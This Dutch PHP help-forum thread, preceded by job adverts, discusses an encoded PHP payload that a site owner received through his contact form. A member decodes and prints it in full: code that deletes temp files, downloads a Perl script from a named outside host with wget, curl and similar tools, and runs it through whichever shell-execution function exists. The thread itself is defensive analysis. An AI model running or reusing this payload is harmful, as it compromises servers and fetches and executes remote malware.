malware hack poging

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Low Code Developer

Functie omschrijving Ben jij toe aan een nieuwe uitdaging en ben jij HBO afgestudeerd in de richting van IT? Heb jij verstand van datamodellering, NO CODE Platformen en kun jij het aan om projecten te leiden? Voor een leuke opdrachtgever in omgeving Capelle aan den IJssel zijn wij op zoek naar een No Code developer die zich bezig gaat houden met het optimaliseren van bedrijfsprocessen bij klanten in heel het land! Wat ga je hier zoal doen? Je gaat geen code kloppen maar bedenken hoe applicaties eruit moet komen te zien. Je gaat werken met een non code platform, je

Bekijk vacature »

Backend developer

Functie omschrijving Ben jij graag bezig met de back-end van applicaties? Zou je dit graag willen doen voor een kleine werkgever waar ook tijd is voor een drankje op zijn tijd? Je taken hierbij zullen bestaan uit: Gebruik maken van de volgende technieken: .NET (core), C#, SQL, XML, MVC, JSON, REST & SOAP API. Gebruik maken van de volgende tools: Visual Studio, GIT, Jira, Jenkins. Bovengenoemde technieken en tools ga je gebruiken om: Nieuwe functionaliteiten te ontwikkelen. Wijzigingsverzoeken van klanten uitvoeren. Verzorgen van koppelingen tussen data. Bedrijfsprofiel Jouw nieuwe werkgever bevindt zich in regio Raamdonksveer en bieden oplossingen op gebied

Bekijk vacature »

Fasttrack learning & development voor Java dev

Wat je gaat doen: Wij zoeken enthousiaste en ambitieuze junior en medior ontwikkelaars die toe zijn aan de volgende stap in hun carrière. Wij helpen je op je pad naar senior ontwikkelaar door ons fasttrack learning en development programma. Na een kort en intensief programma ga jij aan de slag bij klanten van DPA. Daarnaast krijg je veel ruimte om je te ontwikkelen als persoon en als specialist. De eerste maand gaan we aan de slag om je certificeringen te behalen waaronder OCP (Oracle Certified Professional). Daarnaast nemen we een deepdive in Spring Boot. Ook laten we je kennismaken met

Bekijk vacature »

Back end developer PHP

Functie Heb jij altijd al eens bij een bedrijf willen werken waar jij géén nummertje bent, die alleen maar uitvoerend werk doet? Dan zou je hier perfect passen! Tuurlijk, je werkt aan projecten voor grote of kleine bedrijven… Het enige verschil hier is, jouw mening telt hier écht. Jouw inbreng wordt gewaardeerd, serieus genomen en gebruikt. En vergeet niet, je werkt niet alleen aan deze projecten. Er werken in totaal ruim 25 developers en designers, onderverdeeld over 3 development teams. Voornamelijk bestaande uit Medior en Senior developers, die samen voor een inspirerende en ambitieuze omgeving zorgen. Hun visie is namelijk

Bekijk vacature »

Senior PHP developer

Functie Jouw werkzaamheden zullen grotendeels bestaan uit het in teamverband ontwerpen, vernieuwen en door ontwikkelen van het systeem. Het is echt back-end werk (bijvoorbeeld het doorontwikkelen van een API) en dit moet je dan ook liggen. Ze zijn niet persee gebonden aan talen of tools maar gebruiken graag de technieken die het beste aansluiten op de gegeven oplossing. Voor nieuwe (versies van) componenten maken ze veelal gebruik van Go(lang). Bij aanpassingen aan bestaande onderdelen gebeurt dit in PHP en C++. Het team is heel divers, er hangt een relaxte sfeer en ze organiseren regelmatig leuke music nights, game nights e.d.

Bekijk vacature »

Fullstack Developer

Functieomschrijving Heb je kort geleden jouw HBO diploma ICT development behaald? Of zit je nog aan het begin van je carrière en heb je affiniteit met C#.NET? Voor een erkende werkgever in de omgeving van Oosterhout zijn wij op zoek naar een fullstack developer. Als C#.NET developer werk je samen met een vooruitstrevend team aan het ontwikkelen van maatwerk software voor klanten. Je hebt affiniteit met SQL, maar nog belangrijker is dat je kennis en ervaring hebt met C#.NET. Jouw werkzaamheden zien er als volgt uit: Het ontwikkelen van onze high-availability en high-performance backend; Je begint de dag rond 8:30

Bekijk vacature »

APEX Ontwikkelaar in een team van Oracle Developer

Bedrijfsomschrijving Wij zijn op zoek naar een APEX Ontwikkelaar om onze opdrachtgever in Den Haag te versterken. In deze rol zul je verantwoordelijk zijn voor het ontwikkelen en onderhouden van de front-end van onze applicaties met behulp van Oracle Application Express (APEX). Je werkt aan zowel inhouse als externe projecten. De sfeer binnen het Oracle team is gemoedelijk en men probeert elkaar te helpen én van elkaar te leren. Zo ontstaat er een prettige en plezierige werksfeer waar ruimte is voor persoonlijke ontwikkeling en groei. Er wordt gewerkt met de meest nieuwe technologieën waardoor je kennis up-to-date blijft. Het bedrijf

Bekijk vacature »

Back end developer PHP, Laravel

Functie Jij komt te werken in ons webdevelopment team, wat bestaat uit 8 ervaren collega’s. Hiernaast hebben wij nog een team van 2 ontwikkelaars die aan native applicaties werken. Bij ons zijn er korte lijntjes en er hangt een gezellige informele werksfeer. Maar het belangrijkste is natuurlijk dat je aan geweldige applicaties zult gaan werken! Wij willen als organisatie niet te groot worden, we willen gewoon toffe dingen maken. Onze techstack bestaat momenteel uit: PHP, Laravel, Javascript, Typescript, Git, MySQL, Java, Kotlin, Xamarin. Samen met ons ga jij zorgen dat we puik werk leveren! Waarbij je bij elke fase in

Bekijk vacature »

Lead Webdeveloper

As Lead Web Developer at KUBUS you are responsible for the implementation design of requirements and the software architecture of the web application and services of BIMcollab. In your role as lead developer you will naturally search for the optimum between the required implementation time, the performance of the application and a fast go-to-market of features, in line with our automated test and release train. Together with the other senior developers in your team you monitor the architecture of the application and you advise the product owner about necessary refactoring to improve the maintainability of the platform. Our development team

Bekijk vacature »

Medior/Senior Python developer

Functie Jij als Senior Python developer hebt al ruime ervaring opgedaan. Bedrijven komen bij de organisatie om technische vraagstukken op te lossen. Jij als specialist bent dus de representatie van deze kwaliteit. Je zult de keuze krijgen tussen lange of korte projecten waarin je komt te werken in multidisciplinaire teams. Projecten die je gaat uitvoeren zijn zeer uitlopend. Zodoende kun je aan de ene kant kiezen voor een greenfield project en stroom je bij een ander project midden in een migratietraject in. Voor de ene klant ontwikkel je ene nieuwe portal en voor het andere project duik je veel meer

Bekijk vacature »

C++ Ontwikkelaar

Functieomschrijving Ben jij toe aan een nieuwe uitdaging en werk je graag en goed in C++ en C#? Dan zijn we op zoek naar jou! Dit bedrijf is dé specialist op het gebied van automatiseringssoftware voor een specifieke branche en ze zijn per direct op zoek naar versterking in hun development team. Wat jij gaat doen binnen jouw rol als C++ ontwikkelaar; Je vertaalt de wensen van gebruikers naar een functioneel ontwerp. Je houdt je bezig met het ontwerpen, programmeren en testen van product aanpassingen. Je gaat nieuwe product releases implementeren in de projectteams. Je gaat de effecten van nieuwe

Bekijk vacature »

ERP Developer fleet managementsysteem

Wat ga je doen als ERP Developer fleet managementsysteem? Als ERP developer speel jij een belangrijke rol bij het doorvoeren van wijzigingen en verbeteringen binnen het fleet managementsysteem. Jouw expertise op het gebied van ERP systemen stelt jou in staat om de applicatie optimaal te laten functioneren en te blijven ontwikkelen. Als lid van het IT-team werk je nauw samen met andere developers en het business team om het fleet managementsysteem te integreren met andere systemen. Je bent verantwoordelijk voor het ontwikkelen van nieuwe functionaliteiten en het implementeren van verbeteringen op basis van de wensen en eisen van onze klanten.

Bekijk vacature »

Ambitieuze medior developer

Wat je gaat doen: Heb jij al een paar jaar ervaring als developer maar wil jij naar the next level? In ons NextLevelDev Programma helpen wij jou om de volgende stap te zetten: een mooi programma aan trainingen op het gebied van Java, hippe frameworks, Agile/Scrum, OCP-certificering en optioneel: andere JVM-talen als Kotlin en Scala; Cloud (AWS, Azure, GCP) Soc Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun

Bekijk vacature »

Senior C# Software Ontwikkelaar te Zaandam

Bedrijfsomschrijving Deze werkgever heeft als missie om haar klanten op ICT-gebied volledig te ontzorgen. Ze zijn een ICT bedrijf met een verscheidenheid aan ICT oplossingen waaronder Cloud oplossingen en een groot deel van het werk is gericht op software realisatie. Voor de Enterprise-klanten voert het relatief kleine ontwikkelteam waar jij deel uit van kan gaan maken binnen deze organisatie te Zaandam de grootste opdrachten uit. Niet alleen websites en complexe webapplicaties maar ook mobile apps, web services en complete systeemintegraties! Je moet dan denken aan Dynamics, Sharepoint en Salesforce. Je komt hier terecht in een relatief kleine organisatie met ontzettend

Bekijk vacature »

Medior Java developer (fullstack)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »
- Roland -

- Roland -

08/06/2014 11:19:32
Quote Anchor link
Nb. ik heb eval hier even vervangen door XXXX

Ik zie dit via een contact formulier binnenkomen:
Zou dit zo kunnen werken ?
[.php] is toch niet geldig (als alternative < ? p h p )

( . punt door mij toegevoegd )
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
[php]XXXX(base64_decode('ZWNobyAic2V4Y3JpbWUiOw==
ZWNobyUyMCUyMnYwcENyM3clM0NiciUzRSUyMiUzQiUwQWVjaG8lMjAlMjJzeXMlM0ElMjIucGhwX3VuYW1lJTI4JTI5LiUyMiUzQ2JyJTNFJTIyJTNCJTBBJTI0Y21kJTNEJTIyZWNobyUyMG5vYjBkeUNyM3clM0JjZCUyMC90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi50eHQuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQmNkJTIwL3Zhci90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi5qcGcuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQiUyMiUzQiUwQSUyNGVzZWd1aWNtZCUzRGV4JTI4JTI0Y21kJTI5JTNCZWNobyUyMCUyNGVzZWd1aWNtZCUzQiUwQWZ1bmN0aW9uJTIwZXglMjglMjRjZmUlMjklN0IlMEElMjRyZXMlMjAlM0QlMjAlMjclMjclM0IlMEFpZiUyMCUyOCUyMWVtcHR5JTI4JTI0Y2ZlJTI5JTI5JTdCJTBBaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdleGVjJTI3JTI5JTI5JTdCJTBBQGV4ZWMlMjglMjRjZmUlMkMlMjRyZXMlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBqb2luJTI4JTIyJTVDbiUyMiUyQyUyNHJlcyUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3NoZWxsX2V4ZWMlMjclMjklMjklN0IlMEElMjRyZXMlMjAlM0QlMjBAc2hlbGxfZXhlYyUyOCUyNGNmZSUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3N5c3RlbSUyNyUyOSUyOSU3QiUwQUBvYl9zdGFydCUyOCUyOSUzQiUwQUBzeXN0ZW0lMjglMjRjZmUlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBAb2JfZ2V0X2NvbnRlbnRzJTI4JTI5JTNCJTBBQG9iX2VuZF9jbGVhbiUyOCUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3Bhc3N0aHJ1JTI3JTI5JTI5JTdCJTBBQG9iX3N0YXJ0JTI4JTI5JTNCJTBBQHBhc3N0aHJ1JTI4JTI0Y2ZlJTI5JTNCJTBBJTI0cmVzJTIwJTNEJTIwQG9iX2dldF9jb250ZW50cyUyOCUyOSUzQiUwQUBvYl9lbmRfY2xlYW4lMjglMjklM0IlMEElN0QlMEFlbHNlaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdwb3BlbiUyNyUyOSUyOSU3QiUwQSUyNGYlMjAlM0QlMjBAcG9wZW4lMjglMjRjZmUlMkMlMjJyJTIyJTI5JTNCJTBBd2hpbGUlMjglMjFAZmVvZiUyOCUyNGNmZSUyOSUyOSUyMCU3QiUyMCUyNHJlcyUyMC4lM0QlMjBAZnJlYWQlMjglMjRjZmUlMkMxMDI0JTI5JTNCJTIwJTdEJTBBQHBjbG9zZSUyOCUyNGYlMjklM0IlMEElN0QlN0QlMEFyZXR1cm4lMjAlMjRyZXMlM0IlMEElN0Q='));die();[/php]


Gewijzigd op 08/06/2014 11:26:02 door - Roland -
 
PHP hulp

PHP hulp

28/03/2024 19:40:44
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 13:37:29
Quote Anchor link
Ik vermoed dat dit een hack is voor een bepaald 3rd-party webapplicatie?
Krijg je dit in een mail binnen?
 
- Roland -

- Roland -

08/06/2014 14:22:43
Quote Anchor link
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
 
Peter  Flos

Peter Flos

08/06/2014 15:42:36
Quote Anchor link
Ik heb deze voor je gedecodeerd:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
echo%20%22v0pCr3w%3Cbr%3E%22%3B%0Aecho%20%22sys%3A%22.php_uname%28%29.%22%3Cbr%3E%22%3B%0A%24cmd%3D%22echo%20nob0dyCr3w%3Bcd%20/tmp%3Brm%20-rf%20dor.*%20*.txt.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Bcd%20/var/tmp%3Brm%20-rf%20dor.*%20*.jpg.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3B%22%3B%0A%24eseguicmd%3Dex%28%24cmd%29%3Becho%20%24eseguicmd%3B%0Afunction%20ex%28%24cfe%29%7B%0A%24res%20%3D%20%27%27%3B%0Aif%20%28%21empty%28%24cfe%29%29%7B%0Aif%28function_exists%28%27exec%27%29%29%7B%0A@exec%28%24cfe%2C%24res%29%3B%0A%24res%20%3D%20join%28%22%5Cn%22%2C%24res%29%3B%0A%7D%0Aelseif%28function_exists%28%27shell_exec%27%29%29%7B%0A%24res%20%3D%20@shell_exec%28%24cfe%29%3B%0A%7D%0Aelseif%28function_exists%28%27system%27%29%29%7B%0A@ob_start%28%29%3B%0A@system%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27passthru%27%29%29%7B%0A@ob_start%28%29%3B%0A@passthru%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27popen%27%29%29%7B%0A%24f%20%3D%20@popen%28%24cfe%2C%22r%22%29%3B%0Awhile%28%21@feof%28%24cfe%29%29%20%7B%20%24res%20.%3D%20@fread%28%24cfe%2C1024%29%3B%20%7D%0A@pclose%28%24f%29%3B%0A%7D%7D%0Areturn%20%24res%3B%0A%7D


Dat is wat eruit komt. Lijkt inderdaad op een hack, het is in ieder geval een stuk script.

Edit: Ik heb er een link uit gevolgeld:

-Verwijderd-

Deze link leid naar een DDos-Script toe. Ik neem aan dat je je emails vanuit je server zelf, of door je host veilig verstuurt?
Gewijzigd op 08/06/2014 17:49:58 door Peter Flos
 
Obelix Idefix

Obelix Idefix

08/06/2014 16:37:24
Quote Anchor link
Misschien handig/verstandig om die link dan niet als hyperlink op te nemen, als het naar een ddos-script leidt....
 
Peter  Flos

Peter Flos

08/06/2014 17:50:31
Quote Anchor link
Bij deze weggehaald, het ging mij er enkel om om te laten zien dat het dus een ddos poging is geweest.
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 19:01:06
Quote Anchor link
- Roland - op 08/06/2014 14:22:43:
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)

Dan is er niks aan de hand, lijkt me.
 
Christian k

christian k

08/06/2014 20:32:10
Quote Anchor link
als je dit binnen krijgt zonder dat je het zelf geprogrammeerd hebt,
is er wel wat aan de hand lijkt mij?
of zit ik nu fout?
ik zie namelijk niet in hoe een script dit kan versturen zonder dat jij die functie
er in hebt gebouwt?
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 21:15:25
Quote Anchor link
Een botje die denkt dat je een lek 3rd party script gebruikt?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.